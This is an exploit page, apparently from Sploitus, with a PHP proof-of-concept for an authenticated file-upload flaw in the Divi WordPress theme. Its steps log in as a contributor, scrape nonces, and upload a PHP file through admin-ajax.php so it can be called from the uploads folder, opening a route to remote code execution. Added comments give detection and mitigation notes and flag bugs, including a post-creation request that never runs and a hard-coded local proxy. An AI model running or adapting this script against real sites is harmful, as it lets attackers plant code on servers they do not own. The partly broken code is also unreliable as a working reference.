## https://sploitus.com/exploit?id=WPEX-ID:10342
Usage: php poc.php url username password filetoupload

Once the file is uploaded after running the script, you can access the file from the current uploads directory. Example: http://URL/wp-content/uploads/2020/07/divipoc.php

<?php

// Proof-of-concept for the Divi import-upload issue referenced at the top of the
// page (WPEX-ID:10342). Flow as written: authenticate to wp-login.php, scrape the
// REST nonce from post-new.php, prepare a wp/v2/posts request, obtain the Divi
// builder nonces for that post, then submit a multipart upload to admin-ajax.php
// with action=et_core_portability_import. All requests share one cookie jar.
//
// Defender notes: the signal worth alerting on is a low-privilege (contributor-
// level, see step 1) session calling admin-ajax.php with
// action=et_core_portability_import and a multipart 'file' field, followed by a
// request for a .php file under wp-content/uploads. Mitigation is the vendor fix
// for the referenced advisory, plus denying PHP execution in the uploads tree.

// Settings — all four values are taken positionally from argv; there is no
// argument-count check, so a missing argument raises an undefined-index notice
// instead of a usage error.
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$upfile = $argv[4];

// Hard-coded local proxy. It is only applied to the final upload request below,
// so that request will fail unless something is listening on 127.0.0.1:8080.
$proxy = '127.0.0.1:8080';
// NOTE(review): $wp_url and $uploadinfo are built here but never read again;
// every request uses $siteurl directly.
$urlbits = parse_url( $siteurl );
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';
$uploadinfo=array('dir'=>'..','folder'=>'/inc');

//Json Encode Our New Post — body for the wp/v2/posts request; the post is
// requested with status "pending".
$data = array(
    "title" => "Exploit Post",
    "content" => "<!-- wp:paragraph -->\nSample\n<!-- /wp:paragraph -->",
    "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length (byte length, used for the Content-Length header)
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
// Form-encoded POST to wp-login.php; the cookie jar written here is reused by
// every later request. The response is stored in $output but never inspected,
// so a failed login is not detected at this point.
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
// 2) Fetch the new-post editor page; the REST nonce is embedded in its inline
// script and scraped with a regex below.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
// The preg_match result is not checked; if the pattern is absent (not logged in,
// different editor markup) $matches[1] is undefined and $restnonce is null.
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
// 3) JSON POST to the REST posts endpoint, authenticated by cookie + X-WP-Nonce.
// NOTE(review): this handle is configured but never executed or closed here;
// $content used by the next preg_match is still the post-new.php response.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . 'wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

//Grab the page-id
// First "id":<value>, occurrence in $content; again unchecked.
preg_match('/"id":([^"]+),/', $content, $matches);
$pageid = $matches[1];

echo 'Grabbing Activation Nonce!';
// Pull the Import Nonce
// 4) Load the post with the builder flag (et_fb=1) and scrape
// et_fb_activation_nonce from the response. The query string is used exactly
// as written in the original script.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Actually the activation nonce (see the variable name); the "Import Nonce"
// label is reused from the next step. Unchecked preg_match as above.
preg_match("/et\_fb\_activation\_nonce\=([^']+)\'/", $content, $matches);
$activationnonce = $matches[1];

echo 'Activating Theme Builder For Post!';
// 5) Activate the builder for the post using the scraped activation nonce.
// The response is read into $content but not used.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb_activation_nonce=' . $activationnonce);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

echo 'Getting Another Nonce!';
// 6) Reload the builder view (PageSpeed=off) so the etCorePortability JSON
// with the "import" nonce is present in the page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '?=' . $pageid . '&et_fb=1&PageSpeed=off');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Import Nonce
// Scraped from etCorePortability = {"nonces":{"import":"..."}}; unchecked.
preg_match('/etCorePortability\s=\s\{"nonces":\{"import":"([^"]+)"/', $content, $matches);
$importnonce = $matches[1];

echo 'Uploading file!';
//Upload a file
// 7) Multipart POST to admin-ajax.php with action=et_core_portability_import.
// This is the request a WAF/log rule should key on (see header notes).
// realpath() returns false for a missing path and that is not checked.
// The User-Agent is a spoofed, very old Firefox string; the request is routed
// through the hard-coded proxy set above.
$ch = curl_init();
$cFile = curl_file_create( realpath( $upfile ) );
curl_setopt( $ch, CURLOPT_URL, $siteurl . 'wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' =>  'et_core_portability_import',
    'include_global_presets' => 'undefined',
    'nonce' => $importnonce,
    'content' => 'false',
    'context' => 'et_builder',
    'file' => $cFile
] );

// Raw server response is dumped as-is; no success/failure interpretation.
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>